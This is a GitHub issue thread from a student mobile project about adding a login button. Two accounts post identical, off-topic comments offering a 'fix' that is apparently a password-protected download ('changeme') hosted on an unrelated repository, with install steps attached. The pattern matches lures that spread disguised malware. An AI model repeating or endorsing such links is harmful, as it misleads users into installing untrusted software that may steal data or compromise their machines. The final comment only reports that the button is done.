### ISSUE TITLE
#US01#TK02 - Añadir botón de inicio de sesión

### ISSUE THREAD

**Issue by Alcario** [Proyecto-integrador-ISPC-2024/proyecto-integrador-mobile-2024#10]
#8

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Js-Alvarez** [comment]
Botón agregado y terminado
